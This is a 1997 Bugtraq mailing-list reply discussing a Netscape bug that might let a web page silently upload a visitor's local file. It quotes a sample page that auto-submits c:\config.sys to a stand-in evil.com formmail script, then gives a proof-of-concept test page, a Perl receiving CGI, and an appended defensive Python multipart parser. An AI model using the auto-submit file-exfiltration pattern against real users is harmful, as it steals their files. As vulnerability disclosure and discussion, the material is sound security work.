[4694] in bugtraq


Re: Netscape Exploit

daemon@ATHENA.MIT.EDU (Micah Brandon)
Sat Jun 14 22:38:58 1997

Date: 	Sat, 14 Jun 1997 19:57:55 -0400
Reply-To: Micah Brandon <brandon@VV.COM>
From: Micah Brandon <brandon@VV.COM>
X-To:         root <root@BACKWATER.PBX.ORG>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.LNX.3.93.970614192039.1693A-200000@backwater.pbx.org>

At 07:21 PM 6/14/97 -0500, root wrote:
>Here is a sample it isn't complete but you get the basic idea of what is
>going on
><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
>
><BODY onLoad="daForm.submit()">
><FORM
>       NAME="daForm"
>       ACTION="http://evil.com/cgi-bin/formmail.pl"
>       METHOD=POST>
>
><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
>Harddrive">
><INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">
>
>and so on and so forth...

        Ah... this won't work because you're onLoad'ing daForm before you've named
the form "daForm" plus the <INPUT TYPE=FILE...> line won't take a VALUE
attribute.

        I've been hackin' at this, but I can't get it either.  I can "see" the
value attribute being set but I don't think it's possible to change it with
JavaScript.  We're probably barking up the wrong tree.  Anyway, take a look
at the code below.  Perhaps someone can take it from here:

<HTML>
<HEAD>

<SCRIPT>

function ShowFilename() {

         // Uncomment this line and comment the alert line if you want this
         // script to "auto" submit
         // document.forms[0].submit();

         // Display filename
         alert(document.forms[0].userfile.value);

         }

</SCRIPT>

<TITLE>
Netscape Bug Test Page
</TITLE>
</HEAD>
<BODY>
<CENTER>
<H2>Netscape Bug Test Page</H2>
<HR>

<FORM OnSubmit="ShowFilename()"
      ACTION="send.cgi"
      ENCTYPE="multipart/form-data"
      METHOD="POST">

<INPUT TYPE=FILE NAME=userfile>
<INPUT TYPE=SUBMIT VALUE="Send File">
</FORM>

<!-- Uncomment this IMG SRC line to have the loading
     of an image trigger the ShowFilename script.
     Together with uncommenting the submit() line
     in the ShowFilename script, the form above will
     submit itself automatically.

<IMG OnLoad="ShowFilename()" SRC="pix.gif">

-->

<HR>
</CENTER>
</BODY>
</HTML>


And send.cgi is...

#!/usr/bin/perl
use strict;

# Header
print "Content-type: text/html\n\n";
print "<H2>YOUR FILE</H2>";
print "<PRE>";

# Echo the raw multipart/form-data POST body back to the browser
my $FILETEXT = '';
while (<STDIN>) {

  $FILETEXT .= $_;
  print;

  }

print "</PRE>";

# Save the file to your server as well
open(SOMEFILE, "> /tmp/fromweb") or die "cannot write /tmp/fromweb: $!";
print SOMEFILE $FILETEXT;
close(SOMEFILE);

---
micah
brandon@vv.com
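What send.cgi reads from STDIN is a raw multipart/form-data body. The following Python is an added example, not part of the original post or of send.cgi: it parses such a body into its parts, showing that the filename the browser supplies (here the "c:\config.sys" the thread is about) is entirely client-controlled, and reduces it to a safe leaf name before a server would use it. The boundary and sample body are constructed to mimic what the test page would post with one file selected.

```python
import re

# Constructed sample of the raw body send.cgi would read from STDIN when the
# test page above is submitted with one file chosen (not captured traffic).
BOUNDARY = "---------------------------7d33a816d302b6"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="userfile"; filename="c:\\config.sys"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "DEVICE=C:\\WINDOWS\\HIMEM.SYS\r\nFILES=40\r\n"
    f"--{BOUNDARY}--\r\n"
).encode("latin-1")

DISPOSITION_RE = re.compile(r"^Content-Disposition:\s*form-data(.*)$", re.I)
PARAM_RE = re.compile(r';\s*(\w+)="([^"]*)"')

def parse_multipart(body: bytes, boundary: str) -> list:
    """Split a multipart/form-data body into parts: each starts after
    '--boundary CRLF', headers end at a blank line, data ends before the
    CRLF that precedes the next delimiter."""
    delim = b"--" + boundary.encode("ascii")
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):        # '--boundary--' closes the body
            break
        if not chunk.startswith(b"\r\n"):
            raise ValueError("malformed part: no CRLF after delimiter")
        head, sep, data = chunk[2:].partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("malformed part: headers not terminated")
        if data.endswith(b"\r\n"):
            data = data[:-2]
        name = filename = None
        for line in head.decode("latin-1").split("\r\n"):
            m = DISPOSITION_RE.match(line)
            if m:
                params = dict(PARAM_RE.findall(m.group(1)))
                name, filename = params.get("name"), params.get("filename")
        parts.append({"name": name, "filename": filename, "data": data})
    return parts

def safe_filename(client_name: str) -> str:
    """Keep only the leaf of the client-supplied name: drop drive letters and
    directories under either separator, then allow a conservative charset."""
    leaf = re.split(r"[\\/]", client_name)[-1]
    leaf = re.sub(r"[^\w.-]", "_", leaf).lstrip(".")
    return leaf or "upload"
```

Storing the upload under safe_filename() in a dedicated directory, rather than at a fixed path like /tmp/fromweb, avoids both path traversal from the client-supplied name and one upload overwriting another.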
